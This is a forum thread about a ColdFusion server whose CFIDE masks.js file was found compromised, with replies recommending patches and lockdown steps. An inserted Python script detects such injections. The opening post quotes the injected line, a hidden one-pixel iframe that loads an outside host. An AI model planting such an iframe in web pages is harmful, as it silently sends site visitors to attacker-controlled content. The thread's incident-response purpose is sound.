Participant
September 3, 2013
Question

CFIDE/scripts/masks.js Compromised

  • September 3, 2013
  • 4 replies
  • 2340 views

We just found an injection at the end of masks.js

Here is the content that was added:

"document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");"

Not sure what to make out of it. We have a very cryptic password known only to 2 people. Hacking the server would be pretty difficult so I assume somehow hacking into CFIDE was the issue. Anybody seen anything similar?

It must have happened on August 31, 2013.

We are using CF 9.02 with ....lib/updates/hf902-00003.jar

Thanks for any feedback and advice on how to prevent another one.

Rob
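One way to catch this kind of appended injection, as an added example that is not part of the original post: a small Python audit that compares a script against a known-good hash and scans it for document.write() calls emitting a 0/1-pixel iframe, the pattern quoted above. The masks.js content below is a constructed stub, not the real file.

```python
import hashlib
import re
from typing import Dict, List

# Constructed sample input, not the real file: a stub of a clean masks.js and the
# same stub with the injected line quoted in the thread appended at the end.
CLEAN_MASKS_JS = "function maskInit(){return true;}\n"
INJECTED_LINE = (
    "document.write(\"<iframe width='1' height='0' "
    "src='http://top12.oufm.info/'></iframe>\");\n"
)
INJECTED_MASKS_JS = CLEAN_MASKS_JS + INJECTED_LINE

# document.write(<anything up to the first closing paren>); a URL containing ')'
# would cut the match short, which is acceptable for a first-pass scan.
DOC_WRITE = re.compile(r"document\.write\s*\((.*?)\)\s*;?", re.IGNORECASE | re.DOTALL)
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"(\w+)\s*=\s*['\"]?([^'\" >]+)")


def sha256_hex(text: str) -> str:
    """Hash a file's text so it can be compared with a known-good baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def find_hidden_iframes(js_text: str) -> List[Dict[str, str]]:
    """Return every document.write() that emits a 0- or 1-pixel iframe, with its src."""
    findings = []
    for call in DOC_WRITE.finditer(js_text):
        for tag in IFRAME_TAG.finditer(call.group(1)):
            attrs = {k.lower(): v for k, v in ATTR.findall(tag.group(1))}
            tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            if tiny:
                findings.append({"src": attrs.get("src", ""), "offset": str(call.start())})
    return findings


def audit_script(js_text: str, baseline_sha256: str) -> Dict[str, object]:
    """Combine an integrity check against a baseline hash with the content scan."""
    return {
        "hash_matches": sha256_hex(js_text) == baseline_sha256,
        "hidden_iframes": find_hidden_iframes(js_text),
    }


if __name__ == "__main__":
    baseline = sha256_hex(CLEAN_MASKS_JS)  # record this from a known-clean install
    print(audit_script(CLEAN_MASKS_JS, baseline))
    print(audit_script(INJECTED_MASKS_JS, baseline))
```

In practice the baseline hashes come from a clean install or the hotfix jar's copies of CFIDE/scripts, and the scan is run over every .js file under that directory on a schedule.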


4 replies

Legend
September 3, 2013

Would making all of the /CFIDE folder have basic authentication, for example, stop such an attack?

Anit_Kumar
Inspiring
September 4, 2013

Please refer to the Block /CFIDE requests section of the LockDown Guide (http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf).

And refer to "Set up a virtual directory alias for /CFIDE/scripts" for CFIDE/Scripts in the same guide.

Hope this answers your query.

Regards,

Anit Kumar

Legend
September 4, 2013

Anit, I've read the lockdown guide, but can you also please confirm that putting authentication on the CFIDE folder will also stop such attacks? Or is this not a good idea? If not, why?

XeeMe2Author
Participant
September 3, 2013

Thanks Anit, appreciate it. Yes, we saw it but felt it is not really helping as the CFIDE will need to be accessible virtually somehow. Also it looked like a huge act for just a little improvement.

Steve, thanks a lot for your comment. Do you have a more detailed description somewhere? Not sure how to do what you suggested.

Thanks

Rob

Legend
September 3, 2013

There are various threads on this and similar CFIDE vulnerabilities. Make sure you are at the latest patch/hotfix level. Also for your web facing sites, I always recommend pointing your "cfide" virtual directory to an empty directory and then adding a "scripts" virtual directory under it that points back to the original cfide/scripts location. This fixes most CFIDE vulnerabilities.

Anit_Kumar
Inspiring
September 3, 2013

Hello XeeMe2,

Thank you for your post. Have you followed the LockDown guide for blocking CFIDE requests? Here is the link: http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf

Regards,

Anit Kumar